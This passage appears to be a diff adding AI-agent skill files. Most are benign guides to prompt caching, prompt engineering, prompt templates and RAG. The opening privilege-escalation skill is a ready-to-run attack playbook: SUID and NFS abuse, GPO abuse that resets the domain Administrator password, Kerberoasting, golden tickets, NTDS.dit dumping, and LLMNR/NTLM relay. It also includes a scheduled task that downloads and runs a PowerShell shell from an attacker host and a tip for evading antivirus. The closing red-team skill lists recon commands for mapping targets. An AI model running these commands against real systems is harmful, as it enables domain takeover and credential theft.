showmount -e <victim_ip>

# Mount and exploit no_root_squash
mkdir /tmp/mount
mount -o rw,vers=2 <victim_ip>:/tmp /tmp/mount
cd /tmp/mount
cp /bin/bash .
chmod +s bash
```

#### 5. MySQL Running as Root

```bash
# If MySQL runs as root
mysql -u root -p
\! chmod +s /bin/bash
exit
/bin/bash -p
```

---
### Windows Privilege Escalation

#### 1. Token Impersonation

```powershell
# Using SweetPotato (SeImpersonatePrivilege)
execute-assembly sweetpotato.exe -p beacon.exe

# Using SharpImpersonation
SharpImpersonation.exe user:<user> technique:ImpersonateLoggedOnuser
```

#### 2. Service Abuse

```powershell
# Using PowerUp
. .\PowerUp.ps1
Invoke-ServiceAbuse -Name 'vds' -UserName 'domain\user1'
Invoke-ServiceAbuse -Name 'browser' -UserName 'domain\user1'
```

#### 3. Abusing SeBackupPrivilege

```powershell
import-module .\SeBackupPrivilegeUtils.dll
import-module .\SeBackupPrivilegeCmdLets.dll
Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\temp\ntds.dit
```

#### 4. Abusing SeLoadDriverPrivilege

```powershell
# Load vulnerable Capcom driver
.\eoploaddriver.exe System\CurrentControlSet\MyService C:\test\capcom.sys
.\ExploitCapcom.exe
```

#### 5. Abusing GPO

```powershell
.\SharpGPOAbuse.exe --AddComputerTask --Taskname "Update" `
  --Author DOMAIN\<USER> --Command "cmd.exe" `
  --Arguments "/c net user Administrator Password!@# /domain" `
  --GPOName "ADDITIONAL DC CONFIGURATION"
```

---
### Active Directory Attacks

#### 1. Kerberoasting

```bash
# Using Impacket
GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.100 -request

# Using CrackMapExec
crackmapexec ldap 10.0.2.11 -u 'user' -p 'pass' --kdcHost 10.0.2.11 --kerberoast output.txt
```

#### 2. AS-REP Roasting

```powershell
.\Rubeus.exe asreproast
```

#### 3. Golden Ticket

```powershell
# DCSync to get krbtgt hash
mimikatz# lsadump::dcsync /user:krbtgt

# Create golden ticket
mimikatz# kerberos::golden /user:Administrator /domain:domain.local `
  /sid:S-1-5-21-... /rc4:<NTLM_HASH> /id:500
```

#### 4. Pass-the-Ticket

```powershell
.\Rubeus.exe asktgt /user:USER$ /rc4:<NTLM_HASH> /ptt
klist  # Verify ticket
```

#### 5. Golden Ticket with Scheduled Tasks

```powershell
# 1. Elevate and dump credentials
mimikatz# token::elevate
mimikatz# vault::cred /patch
mimikatz# lsadump::lsa /patch

# 2. Create golden ticket
mimikatz# kerberos::golden /user:Administrator /rc4:<HASH> `
  /domain:DOMAIN /sid:<SID> /ticket:ticket.kirbi

# 3. Create scheduled task
schtasks /create /S DOMAIN /SC Weekly /RU "NT Authority\SYSTEM" `
  /TN "enterprise" /TR "powershell.exe -c 'iex (iwr http://attacker/shell.ps1)'"
schtasks /run /s DOMAIN /TN "enterprise"
```

---
### Credential Harvesting

#### LLMNR Poisoning

```bash
# Start Responder
responder -I eth1 -v

# Create malicious shortcut (Book.url) on a writable share:
[InternetShortcut]
URL=https://facebook.com
IconIndex=0
IconFile=\\attacker_ip\not_found.ico
```

#### NTLM Relay

```bash
responder -I eth1 -v
ntlmrelayx.py -tf targets.txt -smb2support
```

#### Dumping with VSS

```powershell
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\
```

---
## Quick Reference

| Technique | OS | Domain Required | Tool |
|-----------|-----|-----------------|------|
| Sudo Binary Abuse | Linux | No | GTFOBins |
| Cron Job Exploit | Linux | No | Manual |
| Capability Abuse | Linux | No | getcap |
| NFS no_root_squash | Linux | No | mount |
| Token Impersonation | Windows | No | SweetPotato |
| Service Abuse | Windows | No | PowerUp |
| Kerberoasting | Windows | Yes | Rubeus/Impacket |
| AS-REP Roasting | Windows | Yes | Rubeus |
| Golden Ticket | Windows | Yes | Mimikatz |
| Pass-the-Ticket | Windows | Yes | Rubeus |
| DCSync | Windows | Yes | Mimikatz |
| LLMNR Poisoning | Windows | Yes | Responder |

---

## Constraints

**Must:**
- Have initial shell access before attempting escalation
- Verify target OS and environment before selecting technique
- Use appropriate tool for domain vs local escalation

**Must Not:**
- Attempt techniques on production systems without authorization
- Leave persistence mechanisms without client approval
- Ignore detection mechanisms (EDR, SIEM)

**Should:**
- Enumerate thoroughly before exploitation
- Document all successful escalation paths
- Clean up artifacts after engagement

---

## Examples

### Example 1: Linux Sudo to Root

```bash
# Check sudo permissions
$ sudo -l
User www-data may run the following commands:
    (root) NOPASSWD: /usr/bin/vim

# Exploit vim
$ sudo vim -c ':!/bin/bash'
root@target:~# id
uid=0(root) gid=0(root) groups=0(root)
```

### Example 2: Windows Kerberoasting

```bash
# Request service tickets
$ GetUserSPNs.py domain.local/jsmith:Password123 -dc-ip 10.10.10.1 -request

# Crack with hashcat
$ hashcat -m 13100 hashes.txt rockyou.txt
```

---

## Troubleshooting

| Issue | Solution |
|-------|----------|
| sudo -l requires password | Try other enumeration (SUID, cron, capabilities) |
| Mimikatz blocked by AV | Use Invoke-Mimikatz or SafetyKatz |
| Kerberoasting returns no hashes | Check for service accounts with SPNs |
| Token impersonation fails | Verify SeImpersonatePrivilege is present |
| NFS mount fails | Check NFS version compatibility (vers=2,3,4) |

---

## Additional Resources

For detailed enumeration scripts, use:

- **LinPEAS**: Linux privilege escalation enumeration
- **WinPEAS**: Windows privilege escalation enumeration
- **BloodHound**: Active Directory attack path mapping
- **GTFOBins**: Unix binary exploitation reference
61
skills/prompt-caching/SKILL.md
Normal file
@@ -0,0 +1,61 @@
---
name: prompt-caching
description: "Caching strategies for LLM prompts, including Anthropic prompt caching, response caching, and CAG (Cache Augmented Generation). Use when: prompt caching, cache prompt, response cache, cag, cache augmented."
source: vibeship-spawner-skills (Apache 2.0)
---

# Prompt Caching

You're a caching specialist who has reduced LLM costs by 90% through strategic caching.
You've implemented systems that cache at multiple levels: prompt prefixes, full responses,
and semantic similarity matches.

You understand that LLM caching is different from traditional caching—prompts have
prefixes that can be cached, responses vary with temperature, and semantic similarity
often matters more than exact match.

Your core principles:
1. Cache at the right level—prefix, response, or both
2. K

## Capabilities

- prompt-cache
- response-cache
- kv-cache
- cag-patterns
- cache-invalidation

## Patterns

### Anthropic Prompt Caching

Use Claude's native prompt caching for repeated prefixes.
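As a minimal sketch of the request shape (model name and prompt text here are placeholder assumptions): a `cache_control` marker on the last stable system block asks the API to cache everything up to that point, so repeated calls sharing the prefix skip reprocessing it.

```python
# Sketch: mark a long, stable system prompt as cacheable. Only the user
# message below the cached prefix varies between calls, so the prefix is
# reused instead of reprocessed. Model name is illustrative.
LONG_SYSTEM_PROMPT = "You are a support agent. " + "Policy text... " * 200

def build_cached_request(user_message: str) -> dict:
    return {
        "model": "claude-sonnet-4-5",  # assumption: any cache-capable model
        "max_tokens": 1024,
        "system": [
            {
                "type": "text",
                "text": LONG_SYSTEM_PROMPT,
                "cache_control": {"type": "ephemeral"},  # cache breakpoint
            }
        ],
        # Everything after the cached prefix is the per-call, uncached part.
        "messages": [{"role": "user", "content": user_message}],
    }

request = build_cached_request("Where is my order?")
```

The key design point: keep the cacheable prefix byte-identical across calls, and put anything that varies after the breakpoint.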
### Response Caching

Cache full LLM responses for identical or similar queries.
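A hedged sketch of the exact-match variant: key the cache on the full request (model, prompt, temperature) and only reuse entries when generation is deterministic, which ties into the high-temperature anti-pattern below.

```python
import hashlib
import json

_cache: dict[str, str] = {}

def cache_key(model: str, prompt: str, temperature: float) -> str:
    # Hash the full request so any change produces a different key.
    raw = json.dumps([model, prompt, temperature], sort_keys=True)
    return hashlib.sha256(raw.encode()).hexdigest()

def cached_complete(model, prompt, temperature, llm_call):
    key = cache_key(model, prompt, temperature)
    # Only reuse when output is deterministic (temperature 0).
    if temperature == 0 and key in _cache:
        return _cache[key]
    response = llm_call(prompt)
    if temperature == 0:
        _cache[key] = response
    return response

calls = []
def fake_llm(prompt):          # stand-in for a real API call
    calls.append(prompt)
    return f"answer:{prompt}"

a = cached_complete("m", "hi", 0.0, fake_llm)
b = cached_complete("m", "hi", 0.0, fake_llm)  # served from cache
```

Semantic-similarity caching replaces `cache_key` with a nearest-neighbor lookup over query embeddings, at the cost of possible false hits.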

### Cache Augmented Generation (CAG)

Pre-cache documents in the prompt instead of retrieving them with RAG.

## Anti-Patterns

### ❌ Caching with High Temperature

### ❌ No Cache Invalidation

### ❌ Caching Everything

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Cache miss causes latency spike with additional overhead | high | Optimize for cache misses, not just hits |
| Cached responses become incorrect over time | high | Implement proper cache invalidation |
| Prompt caching doesn't work due to prefix changes | medium | Structure prompts for optimal caching |

## Related Skills

Works well with: `context-window-management`, `rag-implementation`, `conversation-memory`
93
skills/prompt-engineer/SKILL.md
Normal file
@@ -0,0 +1,93 @@
---
name: prompt-engineer
description: "Expert in designing effective prompts for LLM-powered applications. Masters prompt structure, context management, output formatting, and prompt evaluation. Use when: prompt engineering, system prompt, few-shot, chain of thought, prompt design."
source: vibeship-spawner-skills (Apache 2.0)
---

# Prompt Engineer

**Role**: LLM Prompt Architect

I translate intent into instructions that LLMs actually follow. I know
that prompts are programming - they need the same rigor as code. I iterate
relentlessly because small changes have big effects. I evaluate systematically
because intuition about prompt quality is often wrong.

## Capabilities

- Prompt design and optimization
- System prompt architecture
- Context window management
- Output format specification
- Prompt testing and evaluation
- Few-shot example design

## Requirements

- LLM fundamentals
- Understanding of tokenization
- Basic programming

## Patterns

### Structured System Prompt

Well-organized system prompt with clear sections

```javascript
- Role: who the model is
- Context: relevant background
- Instructions: what to do
- Constraints: what NOT to do
- Output format: expected structure
- Examples: demonstration of correct behavior
```
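The section layout above can be assembled programmatically so every prompt ships with the same skeleton; a small sketch (section names follow the list above, content strings are illustrative):

```python
# Assemble a system prompt from named sections so structure stays consistent
# across prompts and missing sections are simply omitted.
SECTION_ORDER = ["Role", "Context", "Instructions", "Constraints", "Output format", "Examples"]

def build_system_prompt(sections: dict[str, str]) -> str:
    parts = []
    for name in SECTION_ORDER:
        if name in sections:                  # skip sections not provided
            parts.append(f"## {name}\n{sections[name].strip()}")
    return "\n\n".join(parts)

prompt = build_system_prompt({
    "Role": "You are a support triage assistant.",
    "Instructions": "Classify each ticket as bug, question, or feature request.",
    "Output format": "Reply with exactly one word.",
})
```

Keeping the section order fixed also keeps the stable parts of the prompt at the front, which helps prefix caching.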

### Few-Shot Examples

Include examples of desired behavior

```javascript
- Show 2-5 diverse examples
- Include edge cases in examples
- Match example difficulty to expected inputs
- Use consistent formatting across examples
- Include negative examples when helpful
```
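The consistent-formatting point above can be enforced in code: render every example through one template, then append the real input so the model completes the final `Output:` slot. A sketch with made-up sentiment examples:

```python
# Render few-shot examples in one Input/Output template, then append the
# actual input so the model continues the pattern.
def few_shot_prompt(examples: list[tuple[str, str]], actual_input: str) -> str:
    blocks = [f"Input: {inp}\nOutput: {out}" for inp, out in examples]
    blocks.append(f"Input: {actual_input}\nOutput:")
    return "\n\n".join(blocks)

prompt = few_shot_prompt(
    [("I love it", "positive"), ("Broken on arrival", "negative")],
    "Works fine, I guess",
)
```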

### Chain-of-Thought

Request step-by-step reasoning

```javascript
- Ask model to think step by step
- Provide reasoning structure
- Request explicit intermediate steps
- Parse reasoning separately from answer
- Use for debugging model failures
```
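"Parse reasoning separately from answer" can be as simple as splitting on a sentinel, assuming the prompt instructed the model to end with a line starting `Answer:` (the sentinel and sample response below are illustrative):

```python
# Split a chain-of-thought response into reasoning and final answer,
# assuming the prompt asked the model to finish with "Answer: ...".
def split_reasoning(response: str) -> tuple[str, str]:
    reasoning, sep, answer = response.rpartition("Answer:")
    if not sep:                      # model ignored the format
        return "", response.strip()
    return reasoning.strip(), answer.strip()

raw = "Step 1: 12 apples minus 5 is 7.\nStep 2: 7 plus 3 is 10.\nAnswer: 10"
reasoning, answer = split_reasoning(raw)
```

Keeping the reasoning around (rather than discarding it) is what makes this useful for debugging model failures.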
## Anti-Patterns

### ❌ Vague Instructions

### ❌ Kitchen Sink Prompt

### ❌ No Negative Instructions

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Using imprecise language in prompts | high | Be explicit about the desired behavior |
| Expecting specific format without specifying it | high | Specify the format explicitly |
| Only saying what to do, not what to avoid | medium | Include explicit don'ts |
| Changing prompts without measuring impact | medium | Evaluate changes systematically |
| Including irrelevant context 'just in case' | medium | Curate context |
| Biased or unrepresentative examples | medium | Use diverse examples |
| Using default temperature for all tasks | medium | Choose a task-appropriate temperature |
| Not considering prompt injection in user input | high | Defend against injection |

## Related Skills

Works well with: `ai-agents-architect`, `rag-engineer`, `backend`, `product-manager`
322
skills/prompt-library/SKILL.md
Normal file
@@ -0,0 +1,322 @@
---
name: prompt-library
description: "Curated collection of high-quality prompts for various use cases. Includes role-based prompts, task-specific templates, and prompt refinement techniques. Use when user needs prompt templates, role-play prompts, or ready-to-use prompt examples for coding, writing, analysis, or creative tasks."
---

# 📝 Prompt Library

> A comprehensive collection of battle-tested prompts inspired by [awesome-chatgpt-prompts](https://github.com/f/awesome-chatgpt-prompts) and community best practices.

## When to Use This Skill

Use this skill when the user:

- Needs ready-to-use prompt templates
- Wants role-based prompts (act as X)
- Asks for prompt examples or inspiration
- Needs task-specific prompt patterns
- Wants to improve their prompting

## Prompt Categories

### 🎭 Role-Based Prompts

#### Expert Developer

```
Act as an expert software developer with 15+ years of experience. You specialize in clean code, SOLID principles, and pragmatic architecture. When reviewing code:
1. Identify bugs and potential issues
2. Suggest performance improvements
3. Recommend better patterns
4. Explain your reasoning clearly
Always prioritize readability and maintainability over cleverness.
```

#### Code Reviewer

```
Act as a senior code reviewer. Your role is to:
1. Check for bugs, edge cases, and error handling
2. Evaluate code structure and organization
3. Assess naming conventions and readability
4. Identify potential security issues
5. Suggest improvements with specific examples

Format your review as:
🔴 Critical Issues (must fix)
🟡 Suggestions (should consider)
🟢 Praise (what's done well)
```

#### Technical Writer

```
Act as a technical documentation expert. Transform complex technical concepts into clear, accessible documentation. Follow these principles:
- Use simple language, avoid jargon
- Include practical examples
- Structure with clear headings
- Add code snippets where helpful
- Consider the reader's experience level
```

#### System Architect

```
Act as a senior system architect designing for scale. Consider:
- Scalability (horizontal and vertical)
- Reliability (fault tolerance, redundancy)
- Maintainability (modularity, clear boundaries)
- Performance (latency, throughput)
- Cost efficiency

Provide architecture decisions with trade-off analysis.
```

### 🛠️ Task-Specific Prompts

#### Debug This Code

```
Debug the following code. Your analysis should include:

1. **Problem Identification**: What exactly is failing?
2. **Root Cause**: Why is it failing?
3. **Fix**: Provide corrected code
4. **Prevention**: How to prevent similar bugs

Show your debugging thought process step by step.
```

#### Explain Like I'm 5 (ELI5)

```
Explain [CONCEPT] as if I'm 5 years old. Use:
- Simple everyday analogies
- No technical jargon
- Short sentences
- Relatable examples from daily life
- A fun, engaging tone
```

#### Code Refactoring

```
Refactor this code following these priorities:
1. Readability first
2. Remove duplication (DRY)
3. Single responsibility per function
4. Meaningful names
5. Add comments only where necessary

Show before/after with explanation of changes.
```

#### Write Tests

```
Write comprehensive tests for this code:
1. Happy path scenarios
2. Edge cases
3. Error conditions
4. Boundary values

Use [FRAMEWORK] testing conventions. Include:
- Descriptive test names
- Arrange-Act-Assert pattern
- Mocking where appropriate
```

#### API Documentation

```
Generate API documentation for this endpoint including:
- Endpoint URL and method
- Request parameters (path, query, body)
- Request/response examples
- Error codes and meanings
- Authentication requirements
- Rate limits if applicable

Format as OpenAPI/Swagger or Markdown.
```

### 📊 Analysis Prompts

#### Code Complexity Analysis

```
Analyze the complexity of this codebase:

1. **Cyclomatic Complexity**: Identify complex functions
2. **Coupling**: Find tightly coupled components
3. **Cohesion**: Assess module cohesion
4. **Dependencies**: Map critical dependencies
5. **Technical Debt**: Highlight areas needing refactoring

Rate each area and provide actionable recommendations.
```

#### Performance Analysis

```
Analyze this code for performance issues:

1. **Time Complexity**: Big O analysis
2. **Space Complexity**: Memory usage patterns
3. **I/O Bottlenecks**: Database, network, disk
4. **Algorithmic Issues**: Inefficient patterns
5. **Quick Wins**: Easy optimizations

Prioritize findings by impact.
```

#### Security Review

```
Perform a security review of this code:

1. **Input Validation**: Check all inputs
2. **Authentication/Authorization**: Access control
3. **Data Protection**: Sensitive data handling
4. **Injection Vulnerabilities**: SQL, XSS, etc.
5. **Dependencies**: Known vulnerabilities

Classify issues by severity (Critical/High/Medium/Low).
```

### 🎨 Creative Prompts

#### Brainstorm Features

```
Brainstorm features for [PRODUCT]:

For each feature, provide:
- Name and one-line description
- User value proposition
- Implementation complexity (Low/Med/High)
- Dependencies on other features

Generate 10 ideas, then rank top 3 by impact/effort ratio.
```

#### Name Generator

```
Generate names for [PROJECT/FEATURE]:

Provide 10 options in these categories:
- Descriptive (what it does)
- Evocative (how it feels)
- Acronyms (memorable abbreviations)
- Metaphorical (analogies)

For each, explain the reasoning and check domain availability patterns.
```

### 🔄 Transformation Prompts

#### Migrate Code

```
Migrate this code from [SOURCE] to [TARGET]:

1. Identify equivalent constructs
2. Handle incompatible features
3. Preserve functionality exactly
4. Follow target language idioms
5. Add necessary dependencies

Show the migration step by step with explanations.
```

#### Convert Format

```
Convert this [SOURCE_FORMAT] to [TARGET_FORMAT]:

Requirements:
- Preserve all data
- Use idiomatic target format
- Handle edge cases
- Validate the output
- Provide sample verification
```

## Prompt Engineering Techniques

### Chain of Thought (CoT)

```
Let's solve this step by step:
1. First, I'll understand the problem
2. Then, I'll identify the key components
3. Next, I'll work through the logic
4. Finally, I'll verify the solution

[Your question here]
```

### Few-Shot Learning

```
Here are some examples of the task:

Example 1:
Input: [example input 1]
Output: [example output 1]

Example 2:
Input: [example input 2]
Output: [example output 2]

Now complete this:
Input: [actual input]
Output:
```

### Persona Pattern

```
You are [PERSONA] with [TRAITS].
Your communication style is [STYLE].
You prioritize [VALUES].

When responding:
- [Behavior 1]
- [Behavior 2]
- [Behavior 3]
```

### Structured Output

```
Respond in the following JSON format:
{
"analysis": "your analysis here",
"recommendations": ["rec1", "rec2"],
"confidence": 0.0-1.0,
"caveats": ["caveat1"]
}
```
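When requesting structured output like the JSON template above, it pays to validate the shape before using it; a hedged sketch (field names match the template, the sample reply is fabricated for illustration):

```python
import json

# Keys the JSON template asks the model to return.
REQUIRED_KEYS = {"analysis", "recommendations", "confidence", "caveats"}

def parse_structured_response(raw: str) -> dict:
    data = json.loads(raw)                      # raises on invalid JSON
    missing = REQUIRED_KEYS - data.keys()
    if missing:
        raise ValueError(f"missing keys: {sorted(missing)}")
    if not 0.0 <= data["confidence"] <= 1.0:
        raise ValueError("confidence out of range")
    return data

reply = '{"analysis": "ok", "recommendations": ["a"], "confidence": 0.8, "caveats": []}'
result = parse_structured_response(reply)
```

On a validation failure, a common pattern is to retry once with the error message included in the prompt.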
## Prompt Improvement Checklist

When crafting prompts, ensure:

- [ ] **Clear objective**: What exactly do you want?
- [ ] **Context provided**: Background information included?
- [ ] **Format specified**: How should output be structured?
- [ ] **Examples given**: Are there reference examples?
- [ ] **Constraints defined**: Any limitations or requirements?
- [ ] **Success criteria**: How do you measure good output?

## Resources

- [awesome-chatgpt-prompts](https://github.com/f/awesome-chatgpt-prompts)
- [prompts.chat](https://prompts.chat)
- [Learn Prompting](https://learnprompting.org/)

---

> 💡 **Tip**: The best prompts are specific, provide context, and include examples of desired output.
90
skills/rag-engineer/SKILL.md
Normal file
@@ -0,0 +1,90 @@
---
name: rag-engineer
description: "Expert in building Retrieval-Augmented Generation systems. Masters embedding models, vector databases, chunking strategies, and retrieval optimization for LLM applications. Use when: building RAG, vector search, embeddings, semantic search, document retrieval."
source: vibeship-spawner-skills (Apache 2.0)
---

# RAG Engineer

**Role**: RAG Systems Architect

I bridge the gap between raw documents and LLM understanding. I know that
retrieval quality determines generation quality - garbage in, garbage out.
I obsess over chunking boundaries, embedding dimensions, and similarity
metrics because they make the difference between helpful and hallucinating.

## Capabilities

- Vector embeddings and similarity search
- Document chunking and preprocessing
- Retrieval pipeline design
- Semantic search implementation
- Context window optimization
- Hybrid search (keyword + semantic)

## Requirements

- LLM fundamentals
- Understanding of embeddings
- Basic NLP concepts

## Patterns

### Semantic Chunking

Chunk by meaning, not arbitrary token counts

```javascript
- Use sentence boundaries, not token limits
- Detect topic shifts with embedding similarity
- Preserve document structure (headers, paragraphs)
- Include overlap for context continuity
- Add metadata for filtering
```
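A minimal sketch of the first two bullets, sentence boundaries plus overlap (the regex splitter and size limit are simplifying assumptions; production chunkers also track structure and metadata):

```python
import re

def chunk_by_sentences(text: str, max_chars: int = 200, overlap_sentences: int = 1) -> list[str]:
    # Split on sentence boundaries rather than a fixed character offset.
    sentences = re.split(r"(?<=[.!?])\s+", text.strip())
    chunks, current = [], []
    for sentence in sentences:
        if current and len(" ".join(current) + " " + sentence) > max_chars:
            chunks.append(" ".join(current))
            # Carry the tail of the previous chunk forward for continuity.
            current = current[-overlap_sentences:]
        current.append(sentence)
    if current:
        chunks.append(" ".join(current))
    return chunks

doc = "First point. Second point continues the idea. " * 10
chunks = chunk_by_sentences(doc, max_chars=120)
```

Because every chunk boundary falls on a sentence boundary, no chunk starts or ends mid-thought, which is the failure mode of fixed-size splitting.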
### Hierarchical Retrieval

Multi-level retrieval for better precision

```javascript
- Index at multiple chunk sizes (paragraph, section, document)
- First pass: coarse retrieval for candidates
- Second pass: fine-grained retrieval for precision
- Use parent-child relationships for context
```

### Hybrid Search

Combine semantic and keyword search

```javascript
- BM25/TF-IDF for keyword matching
- Vector similarity for semantic matching
- Reciprocal Rank Fusion for combining scores
- Weight tuning based on query type
```
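Reciprocal Rank Fusion is small enough to sketch in full: it combines rankings by rank position rather than raw score, so BM25 and cosine scores never need to be put on the same scale (document IDs below are made up):

```python
# Reciprocal Rank Fusion: each ranking contributes 1/(k + rank) per document;
# k=60 is the conventional smoothing constant.
def rrf(rankings: list[list[str]], k: int = 60) -> list[str]:
    scores: dict[str, float] = {}
    for ranking in rankings:
        for rank, doc_id in enumerate(ranking):
            scores[doc_id] = scores.get(doc_id, 0.0) + 1.0 / (k + rank + 1)
    return sorted(scores, key=scores.get, reverse=True)

bm25_hits = ["doc3", "doc1", "doc7"]     # keyword ranking
vector_hits = ["doc1", "doc5", "doc3"]   # semantic ranking
fused = rrf([bm25_hits, vector_hits])
```

Documents that appear high in both rankings (doc1, doc3 here) float to the top; weight tuning can scale each ranking's contribution per query type.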
## Anti-Patterns

### ❌ Fixed Chunk Size

### ❌ Embedding Everything

### ❌ Ignoring Evaluation

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Fixed-size chunking breaks sentences and context | high | Use semantic chunking that respects document structure |
| Pure semantic search without metadata pre-filtering | medium | Implement hybrid filtering |
| Using same embedding model for different content types | medium | Evaluate embeddings per content type |
| Using first-stage retrieval results directly | medium | Add a reranking step |
| Cramming maximum context into LLM prompt | medium | Use relevance thresholds |
| Not measuring retrieval quality separately from generation | high | Evaluate retrieval separately |
| Not updating embeddings when source documents change | medium | Implement embedding refresh |
| Same retrieval strategy for all query types | medium | Implement hybrid search |

## Related Skills

Works well with: `ai-agents-architect`, `prompt-engineer`, `database-architect`, `backend`
63
skills/rag-implementation/SKILL.md
Normal file
@@ -0,0 +1,63 @@
---
name: rag-implementation
description: "Retrieval-Augmented Generation patterns including chunking, embeddings, vector stores, and retrieval optimization. Use when: rag, retrieval augmented, vector search, embeddings, semantic search."
source: vibeship-spawner-skills (Apache 2.0)
---

# RAG Implementation

You're a RAG specialist who has built systems serving millions of queries over
terabytes of documents. You've seen the naive "chunk and embed" approach fail,
and developed sophisticated chunking, retrieval, and reranking strategies.

You understand that RAG is not just vector search—it's about getting the right
information to the LLM at the right time. You know when RAG helps and when
it's unnecessary overhead.

Your core principles:
1. Chunking is critical—bad chunks mean bad retrieval
2. Hybri

## Capabilities

- document-chunking
- embedding-models
- vector-stores
- retrieval-strategies
- hybrid-search
- reranking

## Patterns

### Semantic Chunking

Chunk by meaning, not arbitrary size

### Hybrid Search

Combine dense (vector) and sparse (keyword) search

### Contextual Reranking

Rerank retrieved docs with LLM for relevance

## Anti-Patterns

### ❌ Fixed-Size Chunking

### ❌ No Overlap

### ❌ Single Retrieval Strategy

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Poor chunking ruins retrieval quality | critical | Use a recursive character text splitter with overlap |
| Query and document embeddings from different models | critical | Ensure consistent embedding model usage |
| RAG adds significant latency to responses | high | Optimize RAG latency |
| Documents updated but embeddings not refreshed | medium | Maintain sync between documents and embeddings |

## Related Skills

Works well with: `context-window-management`, `conversation-memory`, `prompt-caching`, `data-pipeline`
307
skills/red-team-tools/SKILL.md
Normal file
307
skills/red-team-tools/SKILL.md
Normal file
@@ -0,0 +1,307 @@
|
||||
---
|
||||
name: Red Team Tools and Methodology
|
||||
description: This skill should be used when the user asks to "follow red team methodology", "perform bug bounty hunting", "automate reconnaissance", "hunt for XSS vulnerabilities", "enumerate subdomains", or needs security researcher techniques and tool configurations from top bug bounty hunters.
|
||||
---
|
||||
|
||||
# Red Team Tools and Methodology
|
||||
|
||||
## Purpose
|
||||
|
||||
Implement proven methodologies and tool workflows from top security researchers for effective reconnaissance, vulnerability discovery, and bug bounty hunting. Automate common tasks while maintaining thorough coverage of attack surfaces.
|
||||
|
||||
## Inputs/Prerequisites
|
||||
|
||||
- Target scope definition (domains, IP ranges, applications)
|
||||
- Linux-based attack machine (Kali, Ubuntu)
|
||||
- Bug bounty program rules and scope
|
||||
- Tool dependencies installed (Go, Python, Ruby)
|
||||
- API keys for various services (Shodan, Censys, etc.)
|
||||
|
||||
## Outputs/Deliverables
|
||||
|
||||
- Comprehensive subdomain enumeration
|
||||
- Live host discovery and technology fingerprinting
|
||||
- Identified vulnerabilities and attack vectors
|
||||
- Automated recon pipeline outputs
|
||||
- Documented findings for reporting
|
||||
|
||||
## Core Workflow
|
||||
|
||||
### 1. Project Tracking and Acquisitions
|
||||
|
||||
Set up reconnaissance tracking:
|
||||
|
||||
```bash
|
||||
# Create project structure
|
||||
mkdir -p target/{recon,vulns,reports}
|
||||
cd target
|
||||
|
||||
# Find acquisitions using Crunchbase
|
||||
# Search manually for subsidiary companies
|
||||
|
||||
# Get ASN for targets
|
||||
amass intel -org "Target Company" -src
|
||||
|
||||
# Alternative ASN lookup
|
||||
curl -s "https://bgp.he.net/search?search=targetcompany&commit=Search"
|
||||
```
|
||||
|
||||
### 2. Subdomain Enumeration
|
||||
|
||||
Comprehensive subdomain discovery:
|
||||
|
||||
```bash
|
||||
# Create wildcards file
|
||||
echo "target.com" > wildcards
|
||||
|
||||
# Run Amass passively
|
||||
amass enum -passive -d target.com -src -o amass_passive.txt
|
||||
|
||||
# Run Amass actively
|
||||
amass enum -active -d target.com -src -o amass_active.txt
|
||||
|
||||
# Use Subfinder
|
||||
subfinder -d target.com -silent -o subfinder.txt
|
||||
|
||||
# Asset discovery
|
||||
cat wildcards | assetfinder --subs-only | anew domains.txt
|
||||
|
||||
# Alternative subdomain tools
|
||||
findomain -t target.com -o
|
||||
|
||||
# Generate permutations with dnsgen
|
||||
cat domains.txt | dnsgen - | httprobe > permuted.txt
|
||||
|
||||
# Combine all sources
|
||||
cat amass_*.txt subfinder.txt | sort -u > all_subs.txt
|
||||
```
|
||||
|
||||
### 3. Live Host Discovery
|
||||
|
||||
Identify responding hosts:
|
||||
|
||||
```bash
|
||||
# Check which hosts are live with httprobe
|
||||
cat domains.txt | httprobe -c 80 --prefer-https | anew hosts.txt
|
||||
|
||||
# Use httpx for more details
|
||||
cat domains.txt | httpx -title -tech-detect -status-code -o live_hosts.txt
|
||||
|
||||
# Alternative with massdns
|
||||
massdns -r resolvers.txt -t A -o S domains.txt > resolved.txt
|
||||
```
|
||||
|
||||
### 4. Technology Fingerprinting
|
||||
|
||||
Identify technologies for targeted attacks:
|
||||
|
||||
```bash
|
||||
# Whatweb scanning
|
||||
whatweb -i hosts.txt -a 3 -v > tech_stack.txt
|
||||
|
||||
# Nuclei technology detection
|
||||
nuclei -l hosts.txt -t technologies/ -o tech_nuclei.txt
|
||||
|
||||
# Wappalyzer (if available)
|
||||
# Browser extension for manual review
|
||||
```
|
||||
|
||||
### 5. Content Discovery
|
||||
|
||||
Find hidden endpoints and files:
|
||||
|
||||
```bash
|
||||
# Directory bruteforce with ffuf
|
||||
ffuf -ac -v -u https://target.com/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
|
||||
|
||||
# Historical URLs from Wayback
|
||||
waybackurls target.com | tee wayback.txt
|
||||
|
||||
# Find all URLs with gau
|
||||
gau target.com | tee all_urls.txt
|
||||
|
||||
# Parameter discovery
|
||||
cat all_urls.txt | grep "=" | sort -u > params.txt
|
||||
|
||||
# Generate custom wordlist from historical data
|
||||
cat all_urls.txt | unfurl paths | sort -u > custom_wordlist.txt
|
||||
```
|
||||
|
||||
### 6. Application Analysis (Jason Haddix Method)
|
||||
|
||||
**Heat Map Priority Areas:**
|
||||
|
||||
1. **File Uploads** - Test for injection, XXE, SSRF, shell upload
|
||||
2. **Content Types** - Filter Burp for multipart forms
|
||||
3. **APIs** - Look for hidden methods, lack of auth
|
||||
4. **Profile Sections** - Stored XSS, custom fields
|
||||
5. **Integrations** - SSRF through third parties
|
||||
6. **Error Pages** - Exotic injection points
|
||||
|
||||
**Analysis Questions:**
|
||||
- How does the app pass data? (Params, API, Hybrid)
|
||||
- Where does the app talk about users? (UID, UUID endpoints)
|
||||
- Does the site have multi-tenancy or user levels?
|
||||
- Does it have a unique threat model?
|
||||
- How does the site handle XSS/CSRF?
